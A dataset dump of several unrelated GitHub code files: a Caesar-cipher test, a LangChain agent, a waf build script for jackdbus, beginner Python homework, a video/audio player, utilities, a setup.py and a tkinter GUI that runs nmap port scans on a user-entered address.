cipher = caesar.CaesarCipher()\n\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n decrypted_message = cipher.decrypt(encrypted_message, self.KEY)\n self.assertEqual(self.MESSAGE_TO_ENCRYPT, decrypted_message)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MarcDillar/python-cipher","sub_path":"tests/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74886049424","text":"from utilities import llm\nfrom langchain.chains import LLMMathChain\nfrom langchain.chains import LLMChain\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.prompts import PromptTemplate\nfrom langchain.agents import Tool\nfrom langchain.agents import initialize_agent\n\nclass LangChainAgent:\n def __init__(self):\n self.llm = llm\n\n self.llm_math = LLMMathChain(llm=self.llm)\n\n self.prompt = PromptTemplate(\n input_variables=[\"query\"],\n template=\"{query}\"\n )\n\n self.memory = ConversationBufferMemory(memory_key='chat_history')\n\n self.llm_chain = LLMChain(llm=self.llm, prompt=self.prompt)\n\n self.tools = []\n self.tools.append(\n Tool(\n name='Calculator',\n func=self.llm_math.run,\n description='useful for when you need to answer questions about math'\n )\n )\n self.tools.append(\n Tool(\n name='Language Model',\n func=self.llm_chain.run,\n description=\"use this tool for general purpose queries and logic\"\n )\n )\n\n self.zero_shot_agent = initialize_agent(\n agent=\"zero-shot-react-description\",\n tools=self.tools,\n llm=self.llm,\n verbose=True,\n max_iterations=3\n )\n\n self.conversational_agent = initialize_agent(\n agent='conversational-react-description',\n tools=self.tools,\n llm=self.llm,\n verbose=True,\n max_iterations=3,\n memory=self.memory\n )\n\n def run_zero_shot_agent(self, query):\n return self.zero_shot_agent(query)\n\n def run_conversational_agent(self, query):\n return self.conversational_agent(query)\n\nif __name__ == \"__main__\":\n langchain_agent = LangChainAgent()\n\n print(langchain_agent.run_zero_shot_agent(\"what is (4.5*2.1)^2.2 ?\"))\n print(langchain_agent.run_zero_shot_agent(\"what is the capital of 
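The `CaesarCipher` class under test is not shown in this file. A minimal letters-only ("simple" mode) shift that is consistent with the ROT-13 fixtures above — a sketch, not the project's actual implementation:

```python
def caesar_simple(message: str, key: int) -> str:
    out = []
    for ch in message:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + key) % 26 + base))
        else:
            out.append(ch)  # punctuation and spaces pass through unchanged
    return ''.join(out)

# matches MESSAGE_TO_DECRYPT_SIMPLE_MODE above for KEY = 13
assert caesar_simple("This is my original message!", 13) == "Guvf vf zl bevtvany zrffntr!"
```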
India?\"))\n","repo_name":"riyarana10/Langchain","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72227736466","text":"from __future__ import print_function\n\nimport os\nimport shutil\nimport sys\n\nfrom waflib import Logs, Options, TaskGen\nfrom waflib import Context\nfrom waflib.Build import BuildContext, CleanContext, InstallContext, UninstallContext\n\nVERSION = \"2.22.1\"\nAPPNAME = 'jackdbus'\n\n# these variables are mandatory ('/' are converted automatically)\ntop = '.'\nout = 'build'\n\ndef display_feature(conf, msg, build):\n if build:\n conf.msg(msg, 'yes', color='GREEN')\n else:\n conf.msg(msg, 'no', color='YELLOW')\n\n\ndef options(opt):\n # options provided by the modules\n opt.load('compiler_cxx')\n opt.load('compiler_c')\n opt.load('autooptions')\n\n # install directories\n opt.add_option(\n '--htmldir',\n type='string',\n default=None,\n help='HTML documentation directory [Default: /share/jack-audio-connection-kit/reference/html/',\n )\n opt.add_option('--libdir', type='string', help='Library directory [Default: /lib]')\n opt.add_option('--pkgconfigdir', type='string', help='pkg-config file directory [Default: /pkgconfig]')\n opt.add_option('--mandir', type='string', help='Manpage directory [Default: /share/man/man1]')\n\n # options affecting binaries\n opt.add_option(\n '--platform',\n type='string',\n default=sys.platform,\n help='Target platform for cross-compiling, e.g. cygwin or win32',\n )\n opt.add_option('--debug', action='store_true', default=False, dest='debug', help='Build debuggable binaries')\n\n #opt.set_auto_options_define('HAVE_%s')\n #opt.set_auto_options_style('yesno_and_hack')\n\n # options with third party dependencies\n #doxygen = opt.add_auto_option(\n # 'doxygen',\n # help='Build doxygen documentation',\n # conf_dest='BUILD_DOXYGEN_DOCS',\n # default=False)\n #doxygen.find_program('doxygen')\n\n # dbus options\n opt.recurse('dbus')\n\n # this must be called before the configure phase\n #opt.apply_auto_options_hack()\n\n\ndef detect_platform(conf):\n # GNU/kFreeBSD and GNU/Hurd are treated as Linux\n platforms = [\n # ('KEY, 'Human readable name', ['strings', 'to', 'check', 'for'])\n ('IS_LINUX', 'Linux', ['gnu0', 'gnukfreebsd', 'linux', 'posix']),\n ('IS_FREEBSD', 'FreeBSD', ['freebsd']),\n ('IS_MACOSX', 'MacOS X', ['darwin']),\n ('IS_SUN', 'SunOS', ['sunos']),\n ('IS_WINDOWS', 'Windows', ['cygwin', 'msys', 'win32'])\n ]\n\n for key, name, strings in platforms:\n conf.env[key] = False\n\n conf.start_msg('Checking platform')\n platform = Options.options.platform\n for key, name, strings in platforms:\n for s in strings:\n if platform.startswith(s):\n conf.env[key] = True\n conf.end_msg(name, color='CYAN')\n break\n\nclass WafToolchainFlags:\n \"\"\"\n Waf helper class for handling set of CFLAGS\n and related. 
The flush() method will\n prepend so to allow supplied by (downstream/distro/builder) waf caller flags\n to override the upstream flags in wscript.\n TODO: upstream this or find alternative easy way of doing the same\n \"\"\"\n def __init__(self, conf):\n \"\"\"\n :param conf: Waf configuration object\n \"\"\"\n self.conf = conf\n self.flags = {}\n for x in ('CPPFLAGS', 'CFLAGS', 'CXXFLAGS', 'LINKFLAGS'):\n self.flags[x] = []\n\n def flush(self):\n \"\"\"\n Flush flags to the configuration object\n Prepend is used so to allow supplied by\n (downstream/distro/builder) waf caller flags\n to override the upstream flags in wscript.\n \"\"\"\n for key, val in self.flags.items():\n self.conf.env.prepend_value(key, val)\n\n def add(self, key, val):\n \"\"\"\n :param key: Set to add flags to. 'CPPFLAGS', 'CFLAGS', 'CXXFLAGS' or 'LINKFLAGS'\n :param val: string or list of strings\n \"\"\"\n flags = self.flags[key]\n if isinstance(val, list):\n\t #flags.extend(val)\n for x in val:\n if not isinstance(x, str):\n raise Exception(\"value must be string or list of strings. \", type(x))\n flags.append(x)\n elif isinstance(val, str):\n flags.append(val)\n else:\n raise Exception(\"value must be string or list of strings\")\n\n def add_cpp(self, value):\n \"\"\"\n Add flag or list of flags to CPPFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CPPFLAGS', value)\n\n def add_c(self, value):\n \"\"\"\n Add flag or list of flags to CFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CFLAGS', value)\n\n def add_cxx(self, value):\n \"\"\"\n Add flag or list of flags to CXXFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CXXFLAGS', value)\n\n def add_candcxx(self, value):\n \"\"\"\n Add flag or list of flags to CFLAGS and CXXFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add_c(value)\n self.add_cxx(value)\n\n def add_link(self, value):\n \"\"\"\n Add flag or list of flags to LINKFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('LINKFLAGS', value)\n\ndef configure(conf):\n conf.load('compiler_cxx')\n conf.load('compiler_c')\n\n detect_platform(conf)\n flags = WafToolchainFlags(conf)\n\n conf.check_cfg(package='jackserver', uselib_store='JACKSERVER', args=[\"--cflags\", \"--libs\"])\n\n conf.check_cfg(package='expat', args='--cflags --libs')\n\n flags.add_c('-Wall')\n flags.add_cxx(['-Wall', '-Wno-invalid-offsetof'])\n flags.add_cxx('-std=gnu++11')\n\n if conf.env['IS_FREEBSD']:\n conf.check(lib='execinfo', uselib='EXECINFO', define_name='EXECINFO')\n conf.check_cfg(package='libsysinfo', args='--cflags --libs')\n\n if not conf.env['IS_MACOSX']:\n conf.env.append_unique('LDFLAGS', '-Wl,--no-undefined')\n else:\n conf.check(lib='aften', uselib='AFTEN', define_name='AFTEN')\n conf.check_cxx(\n fragment=''\n + '#include \\n'\n + 'int\\n'\n + 'main(void)\\n'\n + '{\\n'\n + 'AftenContext fAftenContext;\\n'\n + 'aften_set_defaults(&fAftenContext);\\n'\n + 'unsigned char *fb;\\n'\n + 'float *buf=new float[10];\\n'\n + 'int res = aften_encode_frame(&fAftenContext, fb, buf, 1);\\n'\n + '}\\n',\n lib='aften',\n msg='Checking for aften_encode_frame()',\n define_name='HAVE_AFTEN_NEW_API',\n mandatory=False)\n\n # TODO\n flags.add_cxx('-Wno-deprecated-register')\n\n conf.load('autooptions')\n\n conf.env['LIB_PTHREAD'] = ['pthread']\n conf.env['LIB_DL'] = ['dl']\n conf.env['LIB_RT'] = ['rt']\n conf.env['LIB_M'] = ['m']\n conf.env['LIB_STDC++'] = ['stdc++']\n conf.env['JACK_VERSION'] = VERSION\n\n conf.env['BINDIR'] = conf.env['PREFIX'] + 
'/bin'\n\n if Options.options.htmldir:\n conf.env['HTMLDIR'] = Options.options.htmldir\n else:\n # set to None here so that the doxygen code can find out the highest\n # directory to remove upon install\n conf.env['HTMLDIR'] = None\n\n if Options.options.libdir:\n conf.env['LIBDIR'] = Options.options.libdir\n else:\n conf.env['LIBDIR'] = conf.env['PREFIX'] + '/lib'\n\n if Options.options.pkgconfigdir:\n conf.env['PKGCONFDIR'] = Options.options.pkgconfigdir\n else:\n conf.env['PKGCONFDIR'] = conf.env['LIBDIR'] + '/pkgconfig'\n\n if Options.options.mandir:\n conf.env['MANDIR'] = Options.options.mandir\n else:\n conf.env['MANDIR'] = conf.env['PREFIX'] + '/share/man/man1'\n\n if conf.env['BUILD_DEBUG']:\n flags.add_candcxx('-g')\n flags.add_link('-g')\n\n conf.define('JACK_VERSION', conf.env['JACK_VERSION'])\n conf.write_config_header('config.h', remove=False)\n\n conf.recurse('dbus')\n\n flags.flush()\n\n print()\n version_msg = APPNAME + \"-\" + VERSION\n if os.access('version.h', os.R_OK):\n data = open('version.h').read()\n m = re.match(r'^#define GIT_VERSION \"([^\"]*)\"$', data)\n if m != None:\n version_msg += \" exported from \" + m.group(1)\n elif os.access('.git', os.R_OK):\n version_msg += \" git revision will be checked and eventually updated during build\"\n print(version_msg)\n\n conf.msg('Install prefix', conf.env['PREFIX'], color='CYAN')\n conf.msg('Library directory', conf.all_envs['']['LIBDIR'], color='CYAN')\n display_feature(conf, 'Build debuggable binaries', conf.env['BUILD_DEBUG'])\n\n tool_flags = [\n ('C compiler flags', ['CFLAGS', 'CPPFLAGS']),\n ('C++ compiler flags', ['CXXFLAGS', 'CPPFLAGS']),\n ('Linker flags', ['LINKFLAGS', 'LDFLAGS'])\n ]\n for name, vars in tool_flags:\n flags = []\n for var in vars:\n flags += conf.all_envs[''][var]\n conf.msg(name, repr(flags), color='NORMAL')\n\n #conf.summarize_auto_options()\n\n conf.msg('D-Bus service install directory', conf.env['DBUS_SERVICES_DIR'], color='CYAN')\n\n if conf.env['DBUS_SERVICES_DIR'] != conf.env['DBUS_SERVICES_DIR_REAL']:\n print()\n print(Logs.colors.RED + 'WARNING: D-Bus session services directory as reported by pkg-config is')\n print(Logs.colors.RED + 'WARNING:', end=' ')\n print(Logs.colors.CYAN + conf.env['DBUS_SERVICES_DIR_REAL'])\n print(Logs.colors.RED + 'WARNING: but service file will be installed in')\n print(Logs.colors.RED + 'WARNING:', end=' ')\n print(Logs.colors.CYAN + conf.env['DBUS_SERVICES_DIR'])\n print(\n Logs.colors.RED + 'WARNING: You may need to adjust your D-Bus configuration after installing jackdbus'\n )\n print('WARNING: You can override dbus service install directory')\n print('WARNING: with --enable-pkg-config-dbus-service-dir option to this script')\n print(Logs.colors.NORMAL, end=' ')\n print()\n\ndef git_ver(self):\n bld = self.generator.bld\n header = self.outputs[0].abspath()\n if os.access('./version.h', os.R_OK):\n header = os.path.join(os.getcwd(), out, \"version.h\")\n shutil.copy('./version.h', header)\n data = open(header).read()\n m = re.match(r'^#define GIT_VERSION \"([^\"]*)\"$', data)\n if m != None:\n self.ver = m.group(1)\n Logs.pprint('BLUE', \"tarball from git revision \" + self.ver)\n else:\n self.ver = \"tarball\"\n return\n\n if bld.srcnode.find_node('.git'):\n self.ver = bld.cmd_and_log(\"LANG= git rev-parse HEAD\", quiet=Context.BOTH).splitlines()[0]\n if bld.cmd_and_log(\"LANG= git diff-index --name-only HEAD\", quiet=Context.BOTH).splitlines():\n self.ver += \"-dirty\"\n\n Logs.pprint('BLUE', \"git revision \" + self.ver)\n else:\n self.ver = 
\"unknown\"\n\n fi = open(header, 'w')\n fi.write('#define GIT_VERSION \"%s\"\\n' % self.ver)\n fi.close()\n\ndef build(bld):\n bld(rule=git_ver, target='version.h', update_outputs=True, always=True, ext_out=['.h'])\n\n # process subfolders from here\n\n if bld.env['IS_LINUX'] or bld.env['IS_FREEBSD']:\n bld.recurse('man')\n bld.recurse('dbus')\n\n if bld.env['BUILD_DOXYGEN_DOCS']:\n html_build_dir = bld.path.find_or_declare('html').abspath()\n\n bld(\n features='subst',\n source='doxyfile.in',\n target='doxyfile',\n HTML_BUILD_DIR=html_build_dir,\n SRCDIR=bld.srcnode.abspath(),\n VERSION=VERSION\n )\n\n # There are two reasons for logging to doxygen.log and using it as\n # target in the build rule (rather than html_build_dir):\n # (1) reduce the noise when running the build\n # (2) waf has a regular file to check for a timestamp. If the directory\n # is used instead waf will rebuild the doxygen target (even upon\n # install).\n def doxygen(task):\n doxyfile = task.inputs[0].abspath()\n logfile = task.outputs[0].abspath()\n cmd = '%s %s &> %s' % (task.env['DOXYGEN'][0], doxyfile, logfile)\n return task.exec_command(cmd)\n\n bld(\n rule=doxygen,\n source='doxyfile',\n target='doxygen.log'\n )\n\n # Determine where to install HTML documentation. Since share_dir is the\n # highest directory the uninstall routine should remove, there is no\n # better candidate for share_dir, but the requested HTML directory if\n # --htmldir is given.\n if bld.env['HTMLDIR']:\n html_install_dir = bld.options.destdir + bld.env['HTMLDIR']\n share_dir = html_install_dir\n else:\n share_dir = bld.options.destdir + bld.env['PREFIX'] + '/share/jack-audio-connection-kit'\n html_install_dir = share_dir + '/reference/html/'\n\n if bld.cmd == 'install':\n if os.path.isdir(html_install_dir):\n Logs.pprint('CYAN', 'Removing old doxygen documentation installation...')\n shutil.rmtree(html_install_dir)\n Logs.pprint('CYAN', 'Removing old doxygen documentation installation done.')\n Logs.pprint('CYAN', 'Installing doxygen documentation...')\n shutil.copytree(html_build_dir, html_install_dir)\n Logs.pprint('CYAN', 'Installing doxygen documentation done.')\n elif bld.cmd == 'uninstall':\n Logs.pprint('CYAN', 'Uninstalling doxygen documentation...')\n if os.path.isdir(share_dir):\n shutil.rmtree(share_dir)\n Logs.pprint('CYAN', 'Uninstalling doxygen documentation done.')\n elif bld.cmd == 'clean':\n if os.access(html_build_dir, os.R_OK):\n Logs.pprint('CYAN', 'Removing doxygen generated documentation...')\n shutil.rmtree(html_build_dir)\n Logs.pprint('CYAN', 'Removing doxygen generated documentation done.')\n\n\n@TaskGen.extension('.mm')\ndef mm_hook(self, node):\n \"\"\"Alias .mm files to be compiled the same as .cpp files, gcc will do the right thing.\"\"\"\n return self.create_compiled_task('cxx', node)\n","repo_name":"LADI/jackdbus","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33708697818","text":"'''作业1:中国合法工作年龄为18-60岁,即如果年龄小于18的情况为童工,不合法;如果年龄在18-60岁之间为合法工龄;大于60岁为法定退休年龄。\r\n需求:输入年龄判断输出结论\r\n如果年龄小于18,为童工,不合法;如果年龄18-60岁之间,为合法工作年龄如果年龄大于60为退休年龄'''\r\nprint(\"20012374董亚杰\")\r\nage=int(input(\"请输入您的年龄\"))\r\nwhile age>0:\r\n if age<18 :\r\n print(\"当年年龄\"+str(age)+\"为合法工龄\")\r\n break\r\n elif age<=60 :#不满足第一个if 执行elif\r\n print(\"当年年龄\"+str(age)+\"年龄不合法\")\r\n break\r\n else:\r\n print(\"当年年龄\"+str(age) + \"年龄为退休年龄\")\r\n break\r\nelse:\r\n 
print(\"请输入合法年龄\")\r\n'''作业2:坐公交:如果有钱可以上车,没有钱,不能上车;如果上车了,判断是否能坐下-—是否有空座位'''\r\nmoney=int(input(\"您当前零钱是多少呢?\"+'\\n'))\r\nwhile money>3:\r\n print(str(money)+\"车票收取成功,欢迎上车!\")\r\n empty_place = int(input(\"公交车空余位置为\"))\r\n if empty_place>0:\r\n print(\"当前空余位置为\"+str(empty_place) + \"有空位请就坐!\")\r\n break\r\n elif empty_place<=0:\r\n print(\"当前空余位置为\"+str(empty_place) + \"没有空位!\")\r\n break\r\nelse:\r\n print(str(money) + \"车票收取失败,请再次付款,不能上车!\")\r\n'''作业3:多种方法:判断某一年是否为闰年。判断闰年的条件是:年份能被4整除但不能被100整除,或者能被400整除'''\r\n#方法一:\r\nyear=int(input(\"请输入一个年份:\"))\r\nif ((year%4==0)and(year%100!=0))or(year%400==0):\r\n\tprint('当前年份'+str(year)+\"为闰年\")\r\nelse:\r\n\tprint('当前年份'+str(year)+\"不是闰年\")\r\n#方法二:\r\nimport calendar\r\nyear = int(input(\"请输入一个年份:\"))\r\ncheck_year = calendar.isleap(year)\r\nif check_year == True:\r\n print('当前年份'+str(year)+\"为闰年\")\r\nelse:\r\n print('当前年份'+str(year)+\"不是闰年\")\r\n","repo_name":"IPython1/Python-","sub_path":"Python程序设计-WYM/董亚杰_20012374_作业_20220830.py","file_name":"董亚杰_20012374_作业_20220830.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74883078546","text":"import time\n\nimport cv2\nimport sounddevice as sd\n\nfrom video_reader.opencv import init_capture, read_video, release_capture\nfrom video_reader.audio import init_audio, read_audio, audio_samples, audio_finished, release_audio\n\nvideo_path = \"../resource/video.mp4\"\naudio_path = \"../resource/audio.mp3\"\n\ninit_capture(video_path)\ninit_audio(audio_path)\n\nstart_time_ns = time.time_ns()\nms2ns = 10**6\n\nsr, samples, channels = audio_samples()\nshould_out = sr\n\n# def callback(outdata, frames:int, time_, status):\n# global should_out\n# print(should_out)\n# if should_out >= frames:\n# samples, time_ns = read_audio( frames )\n# # print(frames)\n# # outdata.shape = samples.shape\n# outdata[:] = samples\n# should_out -= frames\n# else:\n# samples, time_ns = read_audio( should_out )\n# outdata[:should_out] = samples\n# outdata[should_out:] = 0\n# should_out = 0\n\ndef callback(outdata, frames:int, time_, status):\n samples, time_ns = read_audio( frames )\n outdata[:] = samples\n\nwith sd.OutputStream(sr, channels=channels, blocksize=0, callback=callback) as stream:\n # 循环读取并显示视频帧\n last_time_ms = 0\n while True:\n # 读取一帧视频\n ret, frame, file_time_ms ,time_ns = read_video()\n # 如果读取失败,说明视频结束\n if not ret:\n break\n \n should_out += round((file_time_ms - last_time_ms) / 1000 * sr)\n last_time_ms = file_time_ms\n\n interval = max(1, int(file_time_ms - (time_ns - start_time_ns) / ms2ns))\n # print(interval)\n\n # 显示视频帧\n cv2.imshow(\"Video\", frame)\n\n # 设置每帧的延迟时间为 interval\n key = cv2.waitKey(interval)\n\n # 如果按下 c 键,退出循环\n if key == ord(\"c\"):\n break\n\n# 释放 VideoCapture 对象和窗口\nrelease_capture()\ncv2.destroyAllWindows()\n\nrelease_audio()\n","repo_name":"duolanda/cpp_python_video","sub_path":"py/tests/opencv_audio.py","file_name":"opencv_audio.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42597550044","text":"import logging\n\n# Create a custom logger\nimport os\nimport datetime\n# util file must be placed in root\n\n\ndef get_filelogger(name, filepath = 'file.log'):\n logger = logging.getLogger(name)\n if not len(logger.handlers):\n f_handler = logging.FileHandler(filepath)\n f_handler.setLevel(logging.INFO)\n f_format = logging.Formatter('%(asctime)s - %(name)s - %(processName)s - 
%(threadName)s - %(levelname)s - %(message)s')\n f_handler.setFormatter(f_format)\n logger.addHandler(f_handler)\n logger.setLevel(logging.INFO)\n return logger\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n # Create handlers\n if not len(logger.handlers):\n c_handler = logging.StreamHandler()\n c_handler.setLevel(logging.INFO)\n c_format = logging.Formatter('%(asctime)s - %(name)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s')\n c_handler.setFormatter(c_format)\n logger.addHandler(c_handler)\n logger.setLevel(logging.INFO)\n return logger\n\n\ndef get_full_path(*args):\n \"\"\"get the absolute path of file relative to root/utils file\n\n Args:\n args (str): string paths to join to make an absolute path\n\n Returns:\n str: full absolute path\n \"\"\"\n\n ROOT_PATH = __file__\n ROOT_DIR = os.path.dirname(ROOT_PATH)\n abs_path = os.path.join(ROOT_DIR, *args)\n abs_path = os.path.abspath(abs_path)\n\n return abs_path\n\n\ndef get_model_path(task_name, model_name, model_dir='../models', checkpoint=True, epoch=1, val_acc=0.9):\n\n if checkpoint == True:\n model_file_name = f'cp-{model_name}-{epoch}-{val_acc}.ckpt'\n else:\n model_file_name = model_name\n model_dir = get_full_path(model_dir, task_name, model_file_name)\n\n return model_dir\n\n\ndef get_model_serving_path(task_name, model_name, serving_dir='models'):\n\n serving_path= get_full_path(serving_dir, task_name, model_name )\n\n return serving_path\n\n\ndef get_checkpoint_path(task_name, model_name, model_dir='models'):\n checkpoint_variables = '{epoch:02d}-{val_acc:.2f}'\n save_directory = get_full_path(model_dir, task_name)\n checkpoint_path = f\"{save_directory}/cp-{model_name}-{checkpoint_variables}.ckpt\"\n return checkpoint_path\n\n\ndef get_tensorboard_log_path(task_name,model_dir='models'):\n run_time = datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n log_path = get_full_path(model_dir, task_name, \"logs\", run_time)\n return log_path\n\n\ndef generate_batches(nexamples, batch_size):\n \"\"\"generates a list of tuples of starts and ends of size nbatches\n\n Args:\n nexamples(int):\n batch_size(int):\n\n Returns:\n list: a list of tuples with start and end index of each batch\n\n \"\"\"\n\n nbatches = int(np.ceil(nexamples / batch_size))\n batches = []\n for batch in range(nbatches):\n start = batch * batch_size\n end = start + batch_size\n\n if end > nexamples:\n end = nexamples\n\n batches.append((start, end))\n\n return batches\n\n\ndef get_datetime():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(np.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(int(n / i))\n for divisor in reversed(large_divisors):\n yield divisor\n\n\ndef getBatchsize(nexamples, selectedBatchSize, lowerBound = True):\n \"\"\"return the batchsize which is exactly divisible by the number of examples an is closest to the proposed batchsize\n\n Args:\n nexamples(int):\n selectedBatchSize(int):\n lowerBound(bool):\n\n Returns:\n int: a closet divisible batchsize\n\n \"\"\"\n\n divisors = list(divisorGenerator(nexamples))[1:-1]\n\n if len(divisors) == 0:\n if lowerBound==True:\n return 1\n else:\n return nexamples\n\n previousDivisor = divisors[0]\n for divisor in divisors:\n if selectedBatchSize < divisor:\n if lowerBound == True:\n return previousDivisor\n else:\n return divisor\n previousDivisor = divisor\n\n# get_model_path(\"gender_IN_jabong\", \"resnet50\", epoch=10, 
val_acc=0.93)","repo_name":"mobinalhassan/zalando_fyp","sub_path":"commonutils/snapthat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15288618854","text":"import setuptools\n\nwith open(\"README.md\", encoding=\"utf8\") as readme_file:\n long_description = readme_file.read()\n\nrequirements = [\"pandas>=0.2\", \"numpy>=1\", \"matplotlib>=3\"]\n\nsetuptools.setup(\n name='confidence_tool',\n version=\"0.0.4\",\n author='Andre Frade',\n py_modules=['confidence_tool.confidence_tool'],\n author_email=\"andre.frade@hertford.ox.ac.uk\",\n description='Confidence tool package for classification models',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/apfrade/ConfidenceMeasure.git\",\n packages=setuptools.find_packages(),\n install_requires= requirements,\n python_requires='>=3',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n], \n)","repo_name":"apfrade/ConfidenceMeasure","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39278498779","text":"\n# Network manager project by Tijan\n\n\nfrom tkinter import *\nimport time\nfrom PIL import ImageTk,Image\nimport os.path\nfrom os import path\nfrom tkinter import ttk\nimport nmap \n\n\n\nif os.path.exists(\"proj/.transp.ini\") != True:\n with open(\"proj/.transp.ini\", \"w+\"):\n pass\nif os.path.exists(\"proj/ip.ini\") != True:\n with open(\"proj/.ip.ini\", \"w+\"):\n pass\n\n\nroot = Tk()\ntry: \n root.iconbitmap(\"proj/my.ico\")\nexcept Exception:\n pass\nroot.title(\"Network Manager by Tij\")\nroot.geometry('520x428+50+50')\nroot.overrideredirect(False)\nroot.config(bg='white')\nwith open(\"proj/.transp.ini\", 'r') as f:\n nbr = f.read()\nif nbr != \"\":\n root.attributes(\"-alpha\", nbr)\n\ndef step():\n for x in range(100):\n root.update()\n my_progress['value'] += 5\n \n time.sleep(0.01)\nmy_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=200, mode='determinate')\nmy_progress.grid(pady=200, padx=150)\nstep()\nroot.after(0, my_progress.destroy)\n \ndef wait():\n time.sleep(0.05)\ndef dim(t):\n root.attributes(\"-alpha\", t)\n\ndef ferm():\n root.quit()\ndef get():\n s = int(w.get())\n if s == 0:\n with open(\"proj/.transp.ini.\", \"w\") as f:\n f.write('1')\n \n root.attributes(\"-alpha\", 1)\n \n if s == 1:\n with open(\"proj/.transp.ini.\", \"w\") as f:\n f.write('0.97')\n root.attributes(\"-alpha\", 0.97)\n \n if s == 2:\n root.attributes(\"-alpha\", 0.95)\n \n if s == 3:\n root.attributes(\"-alpha\", 0.93)\n \n if s == 4:\n root.attributes(\"-alpha\", 0.90)\n \n if s == 5:\n root.attributes(\"-alpha\", 0.87)\n \n if s == 6:\n root.attributes(\"-alpha\", 0.84)\n \n if s == 7:\n root.attributes(\"-alpha\", 0.81)\n \n if s == 8:\n root.attributes(\"-alpha\", 0.78)\n \n if s == 9:\n root.attributes(\"-alpha\", 0.75)\n \n if s == 10:\n root.attributes(\"-alpha\", 0.73)\n \n\ndef fermer(e):\n \n root.quit()\ndef show(e):\n root.overrideredirect(False)\n\n# f_colors \n\ndef jaune(e):\n root.config(bg='#fff176')\n fr.config(bg='white')\n lbl2.config(bg='#fff176')\n lbl.config(bg='#fff176')\n w.config(bg='#fff176')\ndef rouge(e):\n root.config(bg='#263238')\n lbl2.config(bg='grey')\n lbl.config(bg='grey')\ndef gris(e):\n 
root.config(bg='grey')\n lbl2.config(bg='grey')\n lbl.config(bg='grey')\n w.config(bg='white')\n\n\n\ndef blanc(e):\n root.config(bg='white')\n lbl2.config(bg='white')\n lbl.config(bg='white')\n w.config(bg='#8bc34a')\n btn_principal.config(bg='#e0e0e0') #4 #buttons = (btn_principal, but1, but_2, but_3, but_4)\n but1.config(bg='#bdbdbd')\n but_2.config(bg='#9e9e9e')\n but_3.config(bg='#757575')\n but_4.config(bg='#616161')\n\n # code\ndef btn_bind(e):\n btn.config(bg='#ef5350')\ndef btn_leave(e):\n btn.config(bg='#f0f4c3')\n#################################\ndef bxes(e):\n lac.config(relief=\"solid\")\ndef bxes_l(e):\n lac.config(relief=\"flat\")\ndef bxes1(e):\n lac3.config(relief=\"solid\")\ndef bxes_l1(e):\n lac3.config(relief=\"flat\")\ndef bxes2(e):\n lac4.config(relief=\"solid\")\ndef bxes_l2(e):\n lac4.config(relief=\"flat\")\ndef show_button():\n frame_principal.grid_forget()\n fr3.grid_forget()\n fr.grid(row=0, column=1)\n root.config(bg=\"#5c6bc0\")\ndef hide():\n \n fr.grid_forget()\n\ndef show2():\n frame_principal.grid_forget()\n fr.grid_forget()\n fr3.grid(row=0, column=1)\n \n\n\ndef overfl(e):\n but1.config(bg=\"#ef5350\")\ndef overfl_leave(e):\n but1.config(bg=\"#5c6bc0\")\ndef overfl2(e):\n but_2.config(bg=\"#ef5350\")\ndef overfl_leave2(e):\n but_2.config(bg=\"#4db6ac\")\ndef overfl3(e):\n but_3.config(bg=\"#ef5350\")\ndef overfl_leave3(e):\n but_3.config(bg=\"#ff8a65\")\ndef overfl4(e):\n but_4.config(bg=\"#ef5350\")\ndef overfl_leave4(e):\n but_4.config(bg=\"#f48fb1\")\n\ndef show_principal(e):\n fr.grid_forget()\n fr3.grid_forget()\n frame_principal.grid(row=0, column=1, sticky='n')\n \ndef bpenter(e):\n btn_principal.config(bg=\"#ef5350\")\ndef bpleave(e):\n btn_principal.config(bg=\"#bdbdbd\")\n\ndef scan():\n with open(\"proj/ip.ini\", 'a') as r:\n r.writelines(e.get())\n text.insert(INSERT, 'Scan en cours...\\n')\n root.update()\n ns = nmap.PortScanner()\n print(ns.nmap_version())\n ns.scan(e.get(),'1-1024','-v')\n print(ns.scaninfo())\n a=ns.csv()\n b=(a.replace(';', ' '))\n text.insert(INSERT, b)\ndef entrer(e):\n scan()\n##################################\n\nfr = Frame(root, bg='white', bd=0)\nfr2 = Frame(root, bg='white', relief=RAISED, bd=0)\nfr2.grid(row=0, column=0, sticky='n')\nfr3 = 